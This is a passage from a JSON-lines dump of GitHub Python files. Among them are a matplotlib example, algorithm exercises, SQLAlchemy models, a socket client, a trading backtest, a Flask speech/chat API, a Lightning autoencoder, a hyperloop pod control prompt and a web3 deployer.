r'$\\mathrm{median}=%.2f$' % (median, ),\n r'$\\sigma=%.2f$' % (sigma, )))\n\nax.hist(x, 50)\n# these are matplotlib.patch.Patch properties\nprops = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n\n# place a text box in upper left in axes coords\nax.text(0.05, 0.95, textstr, transform=ax.transAxes, fontsize=14,\n verticalalignment='top', bbox=props)\n\nplt.show()\n","repo_name":"matplotlib/matplotlib","sub_path":"galleries/examples/text_labels_and_annotations/placing_text_boxes.py","file_name":"placing_text_boxes.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":18437,"dataset":"github-code","pt":"5"} +{"seq_id":"71144081113","text":"\"\"\"\n gold4 : 작업\n URL = https://www.acmicpc.net/problem/2056\n 위상정렬(순서가 정해져 있는 작업)\n\"\"\"\n\nimport sys\n\ndef main():\n N = int(sys.stdin.readline().strip())\n\n child = [[] for _ in range(N+1)]\n parent = [[] for _ in range(N+1)]\n edge_num = [0 for _ in range(N+1)]\n time = [0 for _ in range(N+1)]\n\n for i in range(1,N+1):\n work = list(map(int, sys.stdin.readline().strip().split()))\n\n time[i] = work[0]\n parent_num = work[1]\n for j in range(parent_num):\n parent[i].append(work[j+2])\n child[work[j+2]].append(i)\n \n for i in range(1, N+1):\n edge_num[i] = len(parent[i])\n\n tmp = []\n for i in range(1, N+1):\n if not parent[i]:\n 
tmp.append(i)\n \n for a in tmp:\n q = []\n q.append(a)\n while q:\n next_ = q.pop(0)\n\n for i in child[next_]:\n edge_num[i] -= 1\n\n if edge_num[i] == 0:\n q.append(i)\n\n max_time = 0\n for j in parent[i]:\n if max_time < time[j]:\n max_time = time[j]\n time[i] += max_time\n \n print(max(time))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"D-kuri/algorithm","sub_path":"baekjoon/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7353681204","text":"from sqlalchemy import Column, ForeignKey, UniqueConstraint\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.dialects.mysql import VARCHAR, INTEGER, DOUBLE\nfrom models import Base, CustomModel, User, Pizza\n\n\nclass Order(Base, CustomModel):\n __tablename__ = 'orders'\n user_id = Column(INTEGER, ForeignKey(User.id))\n user = relationship(User, backref='orders')\n shipping_address = Column(VARCHAR(255), nullable=False)\n billing_address = Column(VARCHAR(255), nullable=False)\n price = Column(DOUBLE, nullable=False, default=0.00)\n pizza = relationship(Pizza, secondary='order_pizza')\n\n\nclass OrderedPizza(Base, CustomModel):\n __tablename__ = 'order_pizza'\n __table_args__ = (UniqueConstraint('order_id', 'pizza_id'),)\n\n order_id = Column(INTEGER, ForeignKey(Order.id))\n order = relationship(Order, backref=backref('order_pizza', cascade='all, delete-orphan'))\n\n pizza_id = Column(INTEGER, ForeignKey(Pizza.id))\n pizza = relationship(Pizza, backref=backref('order_pizza', cascade='all, delete-orphan'))\n\n quantity = Column(INTEGER, nullable=False, default=1)\n","repo_name":"ciurezbogdan/nt_desktop_app","sub_path":"models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44210813041","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\n\ndef main():\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(('localhost', 9999))\n conn.sendall((\"MAINMENUREQ\").encode(\"UTF-8\"))\n mainMenu = conn.recv(1024).decode(\"UTF-8\")\n while True:\n # while True:\n inputMenuValue = getMenuInput(mainMenu)\n if (int(inputMenuValue) == 1):\n customerNameForRet = getCustomerNameToFind()\n conn.sendall((\"FINDCUSTOMER,\"+customerNameForRet.lower()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(customerNameForRet+\"\"\"'s detail: \"\"\")\n print(\" \"+responseServerDB)\n print(\"-----------------------------------\")\n elif (int(inputMenuValue) == 2):\n customerDetailToAdd = getCustomerDetailToAdd()\n if not (customerDetailToAdd == \"\"):\n conn.sendall((\"ADDCUSTOMER,\"+customerDetailToAdd).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(responseServerDB)\n print(\"-----------------------------------\")\n elif (int(inputMenuValue) == 3):\n customerNametoDelete = getCustomerNameToDelete()\n conn.sendall((\"DELETECUSTOMER,\" + customerNametoDelete.lower()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 4):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \",\"\") == \"\"):\n customerAgeToUpdate = input(\"Enter new age for update:\")\n conn.sendall((\"UPDATEAGE,\"+customerNameForUpdate+\",\"+customerAgeToUpdate.replace(\" 
\",\"\")).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 5):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \", \"\") == \"\"):\n customerAddressToUpdate = input(\"Enter new address for update:\")\n conn.sendall((\"UPDATEADDRESS,\" + customerNameForUpdate + \",\" + customerAddressToUpdate.replace(\" \", \"\")).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 6):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \", \"\") == \"\"):\n customerAddressToUpdate = input(\"Enter new phone number for update:\")\n conn.sendall((\"UPDATEPHONE,\" + customerNameForUpdate + \",\" + customerAddressToUpdate.strip()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 7):\n conn.sendall((\"PRINTREPORT\").encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 8):\n conn.close()\n print(\"Good bye\")\n sys.exit()\n\ndef getCustomerNameToFind():\n while True:\n customerNameToFind = input(\"Enter Customer Name to find: \")\n if not (customerNameToFind.replace(\" \",\"\") == \"\"):\n return customerNameToFind.lower().replace(\",\",\"-\")\n\ndef getCustomerNameForUpdate():\n while True:\n customerNameToFind = input(\"Enter Customer Name to find \"+'\\n'+\"or enter blank to go to main menu: \")\n if not (customerNameToFind.replace(\" \",\"\") == \"\"):\n return (customerNameToFind.lower().replace(\",\",\"-\"))\n return \"\"\n\ndef tryParseInt(numberForParse):\n try:\n (int(numberForParse))\n return True\n except:\n return False\n\ndef getCustomerNameToDelete():\n while True:\n customerNameToDelete = input(\"Enter Customer Name to find: \")\n if not (customerNameToDelete.replace(\" \",\"\") == \"\"):\n return customerNameToDelete.lower().replace(\",\",\"-\")\n\ndef getCustomerDetailToAdd():\n print(\"\"\"Here we need the customer info to add.\n Name of customer is required.\n To Go back to the menu put 0 (Zero number) for customer name\"\"\")\n customerNameToAdd = \"\"\n while True:\n customerNameToAdd = input(\"Customer Name: \")\n if not (customerNameToAdd.replace(\" \",\"\") == \"\"):\n break\n else:\n print(\"Customer name cannot be blank.\")\n if not (customerNameToAdd == \"0\"):\n customerAgeToAdd = input(\"Customer Age: \")\n customerAddressToAdd = input(\"Customer Address: \")\n customerPhoneToAdd = input(\"Customer Phone:\")\n customerConcatinatedDetailsToAdd = customerNameToAdd.lower().replace(\",\",\"-\")+\"|\"+customerAgeToAdd.replace(\",\",\"-\")+\"|\"+customerAddressToAdd.replace(\",\",\"-\")+\"|\"+customerPhoneToAdd.replace(\",\",\"-\")\n return customerConcatinatedDetailsToAdd\n else:\n return \"\"\n\n\ndef getMenuInput(mainMenu):\n while True:\n print(mainMenu)\n selectValueItem = input(\"Select: \")\n if not ((tryParseInt(selectValueItem))):\n print(\"\"\"Your should select a number,\n do not enter alphabets\"\"\")\n elif ((int(selectValueItem) < 1) or (int(selectValueItem) > 8)):\n print(\"Invalid input, enter your select item in range (1-8).\")\n else:\n return 
selectValueItem\n\n\nmain()","repo_name":"FarzadShamriz/ClientServerPythonSample","sub_path":"ClientDB.py","file_name":"ClientDB.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"41187898546","text":"import random\n\nwhile True:\n num = 0\n cnt = 0\n r = 0\n ran = []\n num = int(input('Input number..?'))\n if num > 0 and num < 10:\n for i in range(0,20):\n r = random.randint(0,10)\n ran.append(r)\n for k in ran:\n if k == num:\n cnt += 1\n print(cnt)\n\n\n\n\n\n\n","repo_name":"jaywoong/learn_python","sub_path":"day06/test05.py","file_name":"test05.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24258179111","text":"def part1(data):\n string = data\n\n # Part 1\n # space = 272\n # Part 2\n space = 35651584\n\n def dragon_curve(string, space):\n if len(string) >= space:\n return string\n \n a = string\n b = string[::-1]\n c = ''\n for char in b:\n if char == '1':\n c += '0'\n else:\n c += '1'\n\n d = a + '0' + c\n return dragon_curve(d, space)\n\n def get_checksum(string, calculated):\n if calculated > 0 and len(string) % 2 != 0:\n return string\n \n checksum = ''\n for i in range(0, len(string), 2):\n if string[i] == string[i + 1]:\n checksum += '1'\n else:\n checksum += '0'\n \n return get_checksum(checksum, calculated + 1)\n\n\n new_string = dragon_curve(string, space)\n checksum = get_checksum(new_string[0:space], 0)\n return checksum\n","repo_name":"Panda4817/Advent-Of-Code-2016","sub_path":"16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18927605173","text":"import pandas as pd\nimport numpy as np\nimport csv \n\nfrom account import Account\n\nclass BBand(object):\n\n def __init__(self, portfolio = [], weights = [], path='../storage/daily/tickers/'):\n self.portfolio = portfolio\n self.path = path\n self.weights = weights\n self.account = Account('bband', 100000)\n if not len(weights):\n self.weights = self.create_portfolio_split()\n\n def create_portfolio_split(self):\n num = len(self.portfolio)\n equal_weights = int(100. 
/ num) / 100.\n weights = {}\n for p in self.portfolio:\n weights[p] = equal_weights\n return weights\n\n def get_portfolio_data(self):\n data = []\n for p in self.portfolio:\n symdata = pd.read_csv(self.path + p)\n data.append(symdata)\n self.data = data\n return self.data\n\n def upper_hit(self, row):\n if row[1].close > row[1].UBAND:\n return 1\n else:\n return 0\n\n def lower_hit(self, row):\n if row[1].close < row[1].LBAND:\n return 1\n else:\n return 0\n\n\n def walkthrough(self, sym, data, start, end):\n df = data[(data.date >=start) & (data.date <= end)]\n #print(len(df))\n #print(df[df.date == start])\n #print(df[df.date == start].close.item())\n #numshares = int(self.account.balance / df[df.date == start].close.item())\n #print('starting quantity', start, numshares, self.account.balance)\n #numshares = self.account.buy('AAPL', numshares, df[df.date == start].close.item())\n #print('starting buy', start, numshares, self.account.balance)\n numshares = 0\n df = df[::-1]\n for i in df.iterrows():\n if i[1].date == start:\n continue\n if i[1].close > i[1].UBAND and numshares > 0:\n numshares = self.account.sell(sym, numshares, df[df.date == i[1].date].close.item())\n print('upper hit: new quantity', i[1].date, numshares, self.account.balance)\n elif i[1].close < i[1].LBAND and numshares == 0:\n numshares = int(self.account.balance / df[df.date == i[1].date].close.item())\n numshares = self.account.buy(sym, numshares, df[df.date == i[1].date].close.item())\n print('lower hit: new quantity', i[1].date, numshares, self.account.balance)\n if numshares > 0:\n numshares = self.account.sell(sym, numshares, df[df.date == end].close.item())\n print(self.account.balance)\n\n\n def portfolio_walkthrough(self, data_list, start, end):\n dfs = [data[(data.date >=start) & (data.date <= end)] for data in data_list]\n #print('starting buy', start, numshares, self.account.balance)\n numshares = {}\n # loop through each day for each symbol\n for sym, df in zip(self.portfolio, dfs):\n df = df[::-1]\n # check the individual weights and balances along with bbands\n for i in df.iterrows():\n #print(i[0])\n if i[1].date == start:\n numshares[sym] = 0\n if i[1].close > i[1].UBAND and numshares[sym] > 0:\n numshares[sym] = self.account.sell(sym, numshares[sym], df[df.date == i[1].date].close.item())\n print('upper hit: new quantity', i[1].date, numshares[sym], self.account.balance)\n elif i[1].close < i[1].LBAND and numshares[sym] == 0:\n numshares[sym] = int((self.account.balance*self.weights[sym]) / df[df.date == i[1].date].close.item())\n numshares[sym] = self.account.buy(sym, numshares[sym], df[df.date == i[1].date].close.item())\n print('lower hit: new quantity', i[1].date, numshares[sym], self.account.balance)\n if numshares[sym] > 0:\n numshares[sym] = self.account.sell(sym, numshares[sym], df[df.date == end].close.item())\n print(self.account.balance)\n \n\n\nif __name__ == '__main__':\n sim = BBand(portfolio=['AAPL'])\n print(sim.portfolio)\n sim.get_portfolio_data()\n #print(len(sim.data))\n\n # make sure start and end are valid trading days!!\n sim.walkthrough(sim.portfolio[0], sim.data[0], \"2019-02-11\", \"2022-02-10\")\n sim = BBand(portfolio=['AAPL', 'AMD'])\n sim.get_portfolio_data()\n sim.portfolio_walkthrough(sim.data, \"2019-02-11\", 
\"2022-02-10\")\n","repo_name":"stvschmdt/fin_playground","sub_path":"src/bband_strategy.py","file_name":"bband_strategy.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11329331643","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def middleNode(self, head):\n len_list = 0\n node = head\n while node:\n node = node.next\n len_list += 1\n mid = len_list // 2\n i = 0\n node = head\n while node:\n if i == mid:\n return node\n i+=1\n node = node.next\n \n# another solution\n# class Solution:\n# def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n# slow = fast = head\n# while fast and fast.next:\n# slow = slow.next\n# fast = fast.next.next\n# return slow","repo_name":"SadriddinDev/LeetCode","sub_path":"Problems/middle-of-the-linked-list.py","file_name":"middle-of-the-linked-list.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33644979936","text":"'''The game predict a number\nthe computer self create and predict the number'''\n\nimport numpy as np\n\nnumber = np.random.randint(1, 101) # create number\n\n\ndef random_predict(number:int=1) -> int:\n ''' random predict the number\n \n Args:\n number (int, optional): create the number. Defaults to 1.\n \n Returns:\n int: caunt of attempts\n '''\n \n count = 0\n\n while True:\n count += 1\n predict_number = np.random.randint(1, 101) \n \n if predict_number == number:\n # print(f'You predict the number! This number is {number}, {count} attempt')\n break\n \n return count\n\n \ndef score_game(random_predict) -> int:\n '''[summary]\n \n Args:\n random_predict ([type]): function prediction\n \n Returns:\n int: mean count of attempt\n '''\n count_ls = []\n np.random.seed(42)\n random_array = np.random.randint(1, 101, size=(1000))\n \n for number in random_array:\n count_ls.append(random_predict(number))\n \n score = int(np.mean(count_ls))\n print(f'your algorifm gess the number in mean {score} attempts')\n return score\n \n\nif __name__ == '__main__':\n score_game(random_predict)","repo_name":"Ruslan-Lis/SF","sub_path":"game_v2.py","file_name":"game_v2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42931365468","text":"import vits\r\nimport os\r\ndef load_models(): \r\n root='./vits/models/'\r\n modelList={}\r\n for path, file_dir, files in os.walk(root):\r\n for file_name in files:\r\n modelList[file_name[:-4]]=0\r\n root='./vits/configs/'\r\n configList={}\r\n for path, file_dir, files in os.walk(root):\r\n for file_name in files:\r\n configList[file_name[:-5]]=0\r\n ans=''\r\n for k, v in configList.items(): \r\n if k in modelList: \r\n ans=k\r\n break\r\n return ans\r\nstartVits=load_models()\r\nansNet=None # vits model\r\nif startVits!='': \r\n hp=\"./vits/configs/\"+startVits+\".json\"\r\n mp=\"./vits/models/\"+startVits+\".pth\"\r\n ansNet=vits.vitsModel(hp_path=hp, model_path=mp)\r\nsid=0\r\n\r\nfrom playsound import playsound\r\n\r\nimport chatGpt.chatgptConeect as cc\r\nimport json\r\ndef load_api_keys(): \r\n path='./chatGpt/openai_api_key.json'\r\n with open(path) as f: \r\n data = json.load(f)\r\n if len(data[\"keys\"])>0: \r\n 
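# default to the first API key listed in openai_api_key.json\r\n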
cc.changeApiKey(data[\"keys\"][0])\r\nload_api_keys()\r\nchatNet=cc.chatgptContinueConnect()\r\n\r\nimport text_dealing as td\r\n\r\ndef playAu(): \r\n playsound('cache/audio/audio.wav')\r\n\r\nfrom flask import Flask, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/echo/')\r\ndef echo(text):\r\n return jsonify(f'you input text is {text}')\r\n\r\n@app.route('/chatting/')\r\ndef chatting(text):\r\n rep=chatNet.reply(text)\r\n return jsonify(rep)\r\n\r\n@app.route('/voice/')\r\ndef voice(text): \r\n text=td.select_lang_mode(text)\r\n ansNet.text_to_audio(text=text, speaker_id=sid)\r\n playAu()\r\n return jsonify(text)\r\n\r\n@app.route('/changeVitsNet/')\r\ndef changeVitsNet(text): \r\n global ansNet\r\n hp=\"./vits/configs/\"+text+\".json\"\r\n mp=\"./vits/models/\"+text+\".pth\"\r\n ansNet=vits.vitsModel(hp_path=hp, model_path=mp)\r\n return jsonify(text)\r\n\r\n@app.route('/changeApiKey/')\r\ndef changeApiKey(text): \r\n cc.changeApiKey(text)\r\n return jsonify(text)\r\n\r\n@app.route('/changeSid/')\r\ndef changeSid(speaker): \r\n global sid\r\n sid=int(speaker)\r\n return jsonify(speaker)\r\n\r\nif __name__ == '__main__':\r\n port = 7777\r\n host = '0.0.0.0'\r\n app.run(host,port=port)","repo_name":"Lambda7-del/live2d-vits-chatting-bot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"29989807932","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom model.plot_helper import plot_recon\nimport lightning.pytorch as pl\nfrom abc import abstractmethod\nfrom lightning.pytorch.loggers.wandb import WandbLogger\nfrom lightning.pytorch.loggers.csv_logs import CSVLogger\n\n\nclass Autoencoder(pl.LightningModule):\n\n def __init__(self, logger: WandbLogger | CSVLogger, hidden_dim: int, input_dim: int, num_embeddings: int, embedding_dim: int, \n n_resblocks: int, learning_rate: float, seq_len: int=200, dropout_p: float=0.1):\n \"\"\"\n Initialize Autoencoder\n \n Args:\n logger (WandbLogger | CSVLogger): Logger \n input_dim (int): Input dimension\n num_embeddings (int): Number of embeddings\n embedding_dim (int): Embedding dimension\n n_resblocks (int): Number of residual blocks\n learning_rate (float): Learning rate\n dropout_p (float, optional): Dropout probability. 
Defaults to 0.1.\n \"\"\"\n super().__init__()\n self._logger = logger.experiment\n self.learning_rate = learning_rate\n self.dropout_p = dropout_p\n self.n_resblocks = n_resblocks\n self.num_embeddings: int = num_embeddings\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.input_dim = input_dim\n self.learning_rate = learning_rate\n self.seq_len = seq_len\n self.last_recon = (0,0)\n\n self.is_wandb_logger = isinstance(logger, WandbLogger)\n\n # optimizer params\n self.betas = (0.9, 0.95)\n self.weight_decay = 0.1 \n\n self.save_hyperparameters()\n\n @abstractmethod\n def forward(self, x: torch.Tensor):\n \"\"\"\n Forward pass of the model\n \n Args:\n x (torch.Tensor): Input data\n \n Returns:\n torch.Tensor: Reconstruction loss, data reconstruction, perplexity\n \"\"\"\n raise NotImplementedError\n\n\n def loss(self, preds: torch.Tensor, labels: torch.Tensor):\n \"\"\"\n Loss function (Rconstructon loss (MSE))\n \n Args:\n preds (torch.Tensor): Predictions\n labels (torch.Tensor): Labels\n \n Returns:\n torch.Tensor: Loss\n \"\"\"\n return F.mse_loss(preds, labels)\n \n @staticmethod\n def weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n try:\n nn.init.xavier_uniform_(m.weight.data)\n m.bias.data.fill_(0)\n except AttributeError:\n print(\"Skipping initialization of \", classname)\n\n def _forward_setp(self, x: torch.Tensor):\n embedding_loss, data_recon, perplexity = self(x)\n recon_error = F.mse_loss(data_recon, x)\n loss = recon_error + embedding_loss\n return loss, recon_error, data_recon\n\n def training_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the training loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('train/loss', loss, prog_bar=True)\n self.log('train/recon_error', recon_error)\n\n sample_idx = torch.randint(0, len(batch), (1,))\n self.last_recon = (batch[sample_idx], data_recon[sample_idx]) \n return {'loss': loss,\n 'recon_error': recon_error}\n\n def validation_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the validation loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('val/loss', loss, sync_dist=True, on_epoch=True, prog_bar=True)\n self.log('val/recon_error', recon_error, sync_dist=True, on_epoch=True)\n\n return {'loss': loss,\n 'recon_error': recon_error,\n 'data_recon': data_recon}\n\n def test_step(self, batch, batch_idx):\n \"\"\"\n PyTorch Lightning calls this inside the test loop\n \"\"\"\n loss, recon_error, data_recon = self._forward_setp(batch)\n self.log('test/loss', loss, sync_dist=True, on_epoch=True, prog_bar=True)\n self.log('test/recon_error', recon_error, sync_dist=True, on_epoch=True)\n return {'loss': loss,\n 'recon_error': recon_error,\n 'data_recon': data_recon}\n\n def on_test_batch_end(self, outputs, batch, batch_idx) -> None:\n if batch_idx % 10 == 0:\n sample_idx = torch.randint(0, len(batch), (1,))\n data_recon = outputs['data_recon'][sample_idx].squeeze(0)\n x_batch = batch[sample_idx].squeeze(0)\n \n plot_recon(self._logger, x_batch, data_recon, title=f\"Test Reconstruction {batch_idx}\", plot_wandb=self.is_wandb_logger) \n\n def configure_optimizers(self):\n optimizer = torch.optim.RAdam(self.parameters(), lr=self.learning_rate)\n return 
optimizer\n\n","repo_name":"tmdt-buw/VQ-VAE-Transformer-Arc-Welding","sub_path":"model/autencoder_lightning_base.py","file_name":"autencoder_lightning_base.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"37352918790","text":"#!/usr/bin/python3\n\nimport logging\nfrom os import path \nfrom logging import config \nfrom time import time\nfrom threading import Thread\nfrom pod_structure import Pod\nfrom StateMachine.statemachine import MainSM\nfrom Communication.tcpserver import TCPComm\nfrom Communication.remote_client import TCPClient\nfrom Communication.data_processing import Data_Processing\nfrom HealthMonitor.healthmonitor import HealthMonitor\nfrom HardwareControl.brakes import Brakes\nfrom HardwareControl.motor import Motor\n\ndef main(root_logger):\n \"\"\"\n Prompt for hyperloop\n\n The prompt will soon come from the remote computer controlling the pod\n but for now it is here. \n\n \"\"\"\n PROMPT = \"[Hyperloop@\\x1b[33mVCU\\x1b[m] ~$ \"\n\n pod = Pod()\n tcp = TCPComm()\n remote = TCPClient(pod)\n sm = MainSM(pod, Brakes(pod), Motor())\n dp = Data_Processing(tcp)\n health = HealthMonitor(pod, tcp, sm)\n\n remote_thread = Thread(target=remote.run, name='RemoteThread')\n health_thread = Thread(target=health.run, name='HealthThread')\n dp_thread = Thread(target=dp.run, name='DPThread')\n remote_thread.start()\n health_thread.start()\n dp_thread.start()\n\n hist = open('.pod_history', 'w')\n hist.write(\"=-=-=-=-=-=-=-=- New Flight -=-=-=-=-=-=-=-=\\n\")\n\n while True:\n user_input = input(PROMPT)\n hist.write(user_input + '\\n')\n\n if user_input == \"state\":\n print(sm.state)\n\t\t\t\n elif user_input == \"launch\":\n\n if input(\"Are you sure? [y/N]\") in (\"Y\", \"y\"):\n sm.on_event('launch')\n\n elif user_input == \"drift\":\n sm.on_event('drift')\n\n elif user_input == \"estop\":\n if input(\"Are you sure (Program must be restarted to recover from estop)? 
[y/N] \") in (\"Y\", \"y\"):\n \"\"\"ESTOP the pod\"\"\"\n sm.on_event('estop')\n else:\n continue\n\t\t\t\t\n elif user_input == \"shutdown\":\n if sm.state != \"Pre_Opeartional\" and sm.state != \"Estop\":\n print(\"[*] Program cannot exit safely currently!\")\n print(\"======> State: %s\" % sm.state)\n continue\n\n tcp.close()\n\n health.stop_signal = True\n dp.stop_signal = True\n health_thread.join()\n dp_thread.join()\n remote.stop_signal = True\n remote_thread.join()\n\n hist.write('\\n')\n hist.close()\n return\n\n else:\n print(\"Commands: \")\n print(\"[1] help : This menu\")\n print(\"[2] state : Current State\")\n print(\"[3] launch : Launch pod with max speed\")\n print(\"[4] drift : Launch pod slowly\")\n print(\"[5] estop : Emergency stop the moving pod\")\n print(\"[6] shutdown : Shutdown program\")\n\n\nif __name__ == \"__main__\":\n\n log_file_path = path.join(path.dirname(path.abspath(__file__)), 'log.ini')\n logging.config.fileConfig(log_file_path)\n logger = logging.getLogger('root')\n\n print(\"====================================================================================================================================\")\n print(\"\\n\\n\\x1b[33m\")\n print(\"\\n\")\n print(\"██╗ ██╗██╗ ██╗██████╗ ███████╗██████╗ ██╗ ██████╗ ██████╗ ██████╗ █████╗ ████████╗ ██╗ ██╗ ██████╗██╗ ██╗\")\n print(\"██║ ██║╚██╗ ██╔╝██╔══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██╔═══██╗██╔══██╗ ██╔══██╗╚══██╔══╝ ██║ ██║██╔════╝██║ ██║\")\n print(\"███████║ ╚████╔╝ ██████╔╝█████╗ ██████╔╝██║ ██║ ██║██║ ██║██████╔╝ ███████║ ██║ ██║ ██║██║ ██║ ██║\")\n print(\"██╔══██║ ╚██╔╝ ██╔═══╝ ██╔══╝ ██╔══██╗██║ ██║ ██║██║ ██║██╔═══╝ ██╔══██║ ██║ ╚██╗ ██╔╝██║ ██║ ██║\")\n print(\"██║ ██║ ██║ ██║ ███████╗██║ ██║███████╗╚██████╔╝╚██████╔╝██║ ██║ ██║ ██║ ╚████╔╝ ╚██████╗╚██████╔╝\")\n print(\"╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═════╝\")\n print(\"\\n\")\n print(\"\\n\\x1b[m\")\n print(\"====================================================================================================================================\")\n\n time_naught = time()\n main(logger)\n time_final = time() - time_naught\n\n logger.info(\"[+] Finished\")\n logger.info(\"[+] Time Elapsed {0:.2f} seconds\\n\".format(time_final))\n\n print(\"\\n\")\n print(\"END OF FLIGHT\")\n\n","repo_name":"HyperloopatVCU/FlightComputer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16769923889","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndef main():\r\n\r\n s = (15,15)\r\n mat = np.zeros(s)\r\n mat = mat.astype(int)\r\n for i in range(15):\r\n for j in range(15):\r\n Downward = np.asarray(mat[0:i,j])\r\n toTheLeft = np.asarray(mat[i,0:j])\r\n Diagonal = np.diag(mat,k = (j-i))[0:min(i,j)]\r\n MinimumExclude = np.concatenate((Downward,toTheLeft,Diagonal))\r\n MinimumExclude = np.sort(MinimumExclude)\r\n \r\n runner = 0\r\n for value in MinimumExclude:\r\n if runner == value:\r\n runner = value + 1\r\n \r\n mat[i][j] = runner\r\n fig, ax = plt.subplots()\r\n\r\n ax.axis('tight')\r\n\r\n df = pd.DataFrame(mat, columns=np.arange(15))\r\n\r\n ax.table(cellText=df.values, colLabels=df.columns, loc='center')\r\n\r\n fig.tight_layout()\r\n\r\n plt.show()\r\n\r\n \r\n\r\n # print(mat)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n 
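# prints a 15x15 table of Wythoff G-values (mex over the column above, the row to the left and the diagonal)\r\n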
main()\r\n\r\n","repo_name":"OrenZauda/G-values-of-Wythoff-game","sub_path":"2 dimension.py","file_name":"2 dimension.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16607046990","text":"\nimport os\nimport json\nfrom typing import Dict, Tuple\nfrom web3 import Web3\n\ndef Deployer(w3, private_key): \n private_key = private_key\n account = w3.eth.account.from_key(private_key)\n\n with open('/Users/abhinavmir/Desktop/Code/eclair/example/abis/abi.json', 'r') as file:\n abi = json.load(file)\n\n with open('/Users/abhinavmir/Desktop/Code/eclair/example/abis/bytecode', 'r') as file:\n bytecode = file.read()\n\n contract = w3.eth.contract(abi=abi, bytecode=bytecode)\n\n deploy_txn = contract.constructor([]).build_transaction({\n 'from': 'your_address',\n 'gas': 200000,\n 'gasPrice': 1000000000,\n 'nonce': 0\n })\n\n signed_txn = account.sign_transaction(deploy_txn)\n deployment_receipt = w3.eth.send_raw_transaction(signed_txn.rawTransaction)\n deployment_receipt = w3.eth.wait_for_transaction_receipt(deployment_receipt)\n contract_address = deployment_receipt['contractAddress']\n return {\n 'contract_address': contract_address,\n 'abi' : abi\n }\nclass contract_HelloWorld_class:\n\n def __init__(self, rpc, private_key):\n self.w3 = Web3(Web3.HTTPProvider(rpc))\n self.deployed = Deployer(self.w3, private_key)\n self.contract_address = self.deployed['contract_address']\n self.abi = self.deployed['abi']\n self.contract = self.w3.eth.contract(address=self.contract_address, abi=self.abi)\n self.private_key = 